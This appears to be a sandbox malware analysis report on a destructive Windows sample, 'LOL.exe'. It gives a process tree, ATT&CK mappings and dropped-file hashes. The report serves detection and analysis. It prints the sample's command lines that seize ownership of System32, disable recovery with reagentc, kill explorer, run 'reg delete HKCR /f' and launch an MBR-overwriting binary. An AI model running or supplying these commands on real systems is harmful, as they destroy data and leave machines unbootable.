PID 1288 wrote to memory of 1748	1288	LOL.exe	cmd.exe
PID 1288 wrote to memory of 1748	1288	LOL.exe	cmd.exe
PID 1288 wrote to memory of 1748	1288	LOL.exe	cmd.exe
PID 1288 wrote to memory of 2644	1288	LOL.exe	lolololol.exe
PID 1288 wrote to memory of 2644	1288	LOL.exe	lolololol.exe
PID 1288 wrote to memory of 2644	1288	LOL.exe	lolololol.exe
PID 1288 wrote to memory of 2644	1288	LOL.exe	lolololol.exe
PID 2644 wrote to memory of 2816	2644	lolololol.exe	cmd.exe
PID 2644 wrote to memory of 2816	2644	lolololol.exe	cmd.exe
PID 2644 wrote to memory of 2816	2644	lolololol.exe	cmd.exe
PID 2816 wrote to memory of 2656	2816	cmd.exe	takeown.exe
PID 2816 wrote to memory of 2656	2816	cmd.exe	takeown.exe
PID 2816 wrote to memory of 2656	2816	cmd.exe	takeown.exe
PID 2816 wrote to memory of 2480	2816	cmd.exe	icacls.exe
PID 2816 wrote to memory of 2480	2816	cmd.exe	icacls.exe
PID 2816 wrote to memory of 2480	2816	cmd.exe	icacls.exe
PID 2816 wrote to memory of 2780	2816	cmd.exe	takeown.exe
PID 2816 wrote to memory of 2780	2816	cmd.exe	takeown.exe
PID 2816 wrote to memory of 2780	2816	cmd.exe	takeown.exe
PID 2816 wrote to memory of 2628	2816	cmd.exe	icacls.exe
PID 2816 wrote to memory of 2628	2816	cmd.exe	icacls.exe
PID 2816 wrote to memory of 2628	2816	cmd.exe	icacls.exe
PID 2816 wrote to memory of 2680	2816	cmd.exe	ReAgentc.exe
PID 2816 wrote to memory of 2680	2816	cmd.exe	ReAgentc.exe
PID 2816 wrote to memory of 2680	2816	cmd.exe	ReAgentc.exe
PID 2816 wrote to memory of 2616	2816	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2616	2816	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2616	2816	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2940	2816	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2940	2816	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2940	2816	cmd.exe	taskkill.exe
PID 2644 wrote to memory of 1768	2644	lolololol.exe	MBR.exe
PID 2644 wrote to memory of 1768	2644	lolololol.exe	MBR.exe
PID 2644 wrote to memory of 1768	2644	lolololol.exe	MBR.exe
PID 2644 wrote to memory of 1768	2644	lolololol.exe	MBR.exe
PID 2644 wrote to memory of 2420	2644	lolololol.exe	WScript.exe
PID 2644 wrote to memory of 2420	2644	lolololol.exe	WScript.exe
PID 2644 wrote to memory of 2420	2644	lolololol.exe	WScript.exe
PID 2644 wrote to memory of 2504	2644	lolololol.exe	cmd.exe
PID 2644 wrote to memory of 2504	2644	lolololol.exe	cmd.exe
PID 2644 wrote to memory of 2504	2644	lolololol.exe	cmd.exe
PID 2504 wrote to memory of 2740	2504	cmd.exe	PING.EXE
PID 2504 wrote to memory of 2740	2504	cmd.exe	PING.EXE
PID 2504 wrote to memory of 2740	2504	cmd.exe	PING.EXE
PID 2504 wrote to memory of 2776	2504	cmd.exe	GDI.exe
PID 2504 wrote to memory of 2776	2504	cmd.exe	GDI.exe
PID 2504 wrote to memory of 2776	2504	cmd.exe	GDI.exe
PID 2504 wrote to memory of 1272	2504	cmd.exe	reg.exe
PID 2504 wrote to memory of 1272	2504	cmd.exe	reg.exe
PID 2504 wrote to memory of 1272	2504	cmd.exe	reg.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

lolololol.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	lolololol.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\LOL.exe
"C:\Users\Admin\AppData\Local\Temp\LOL.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\LOL\KillDuplicate.cmd" "C:\Users\Admin\AppData\Local\Temp\LOL" "LOL.exe""
2⤵
PID:1748

C:\Users\Admin\AppData\Local\Temp\LOL\lolololol.exe
"C:\Users\Admin\AppData\Local\Temp\LOL\lolololol.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && reagentc.exe /disable && taskkill /f /im explorer.exe && taskkill /f /im cmd.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2656

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2480

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2628

C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
4⤵
- Drops file in System32 directory
PID:2680

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\system32\taskkill.exe
taskkill /f /im cmd.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Users\Admin\AppData\Local\Temp\LOL\MBR.exe
"C:\Users\Admin\AppData\Local\Temp\LOL\MBR.exe"
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:1768

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LOL\lol.vbs"
3⤵
PID:2420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k ping 127.0.0.1 -n 10 > nul && start GDI.exe && reg delete HKCR /f && exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
4⤵
- Runs ping.exe
PID:2740

C:\Users\Admin\AppData\Local\Temp\LOL\GDI.exe
GDI.exe
4⤵
- Executes dropped EXE
PID:2776

C:\Windows\system32\reg.exe
reg delete HKCR /f
4⤵
- Modifies system executable filetype association
- Registers COM server for autorun
- Modifies registry class
PID:1272

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:328

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Event Triggered Execution

1

T1546

Change Default File Association

1

T1546.001

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Pre-OS Boot

1

T1542

Bootkit

1

T1542.003

Privilege Escalation

Event Triggered Execution

1

T1546

Change Default File Association

1

T1546.001

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

File and Directory Permissions Modification

1

T1222

Modify Registry

2

T1112

Pre-OS Boot

1

T1542

Bootkit

1

T1542.003

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LOL\GDI.exe
Filesize
11KB

MD5
6924d116e5d91cbf9dc06e196d0eda92

SHA1
2c58bbac7c0e7c433ae1c8fab1ce29b36c953844

SHA256
bced0e0e8a381047dff68ffc932e4a7559b23ff44ee13a9ae52814afaf84d6cc

SHA512
b6f7df052c3f041c41c69e1569714df7761089119ba9771e1d8139e5ac3b45c0af325b131f1dae82c402934d1475d110d15a0ed494156bf57c3065b1b1de67b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\LOL\MBR.exe
Filesize
49KB

MD5
fdf4716db915b7ac49c6504b77b9d9b4

SHA1
5aa337bf59a65370244996826aa891a555497b7a

SHA256
4bd04de45a41056d97eb8c717b65aabcd0b6cd1954121a525ecde0a7805a7da7

SHA512
6c7305cd8c922a1e19d1fef1189f12b828d5c67db76a2b48174149b22a8d8a3f81a1224df509352a188ef868f58a40f48e530602df955a80ea91e36b9d4fef10

Download Submit
C:\Users\Admin\AppData\Local\Temp\LOL\lol.vbs
Filesize
96B

MD5
43c0e3989419de068ceeb33464d57011

SHA1
3a215bc58643e7b3be19f6d4dc15e8daa49fd019

SHA256
510daae2853084652dc59cd4849f1776a489c20de6976027fe6d96d68070d44c

SHA512
b124a309314ffdb1a67eb76bf790f2de45b8a33fd8e540137b6e0868c26bfda7b86320ef19922de3bb058c82c0b75dbc0da29dc9a694009eb6af9e4721bbbb3c

Download Submit
\Users\Admin\AppData\Local\Temp\LOL\lolololol.exe
Filesize
92KB

MD5
ed5f4c9e24f17e35b262fbb9e85b13b8

SHA1
382ac377303faf29c885473c378020162d1e223d

SHA256
9254556fa86e4f6d4778748b399737bf44fee73ce6508b4f2e093cde07260991

SHA512
8af1a81d16f82250fd81e753f082f9e817624eec2aab0c4e9551d509712b531c3ec836b6150e851ac50453c9d1b6576d8606c6d8d9d24209d94b03f150c234fe

Download Submit
memory/1768-19-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2644-15-0x0000000000ED0000-0x0000000000EEC000-memory.dmp

Filesize
112KB

Download
memory/2776-27-0x0000000001090000-0x000000000109A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads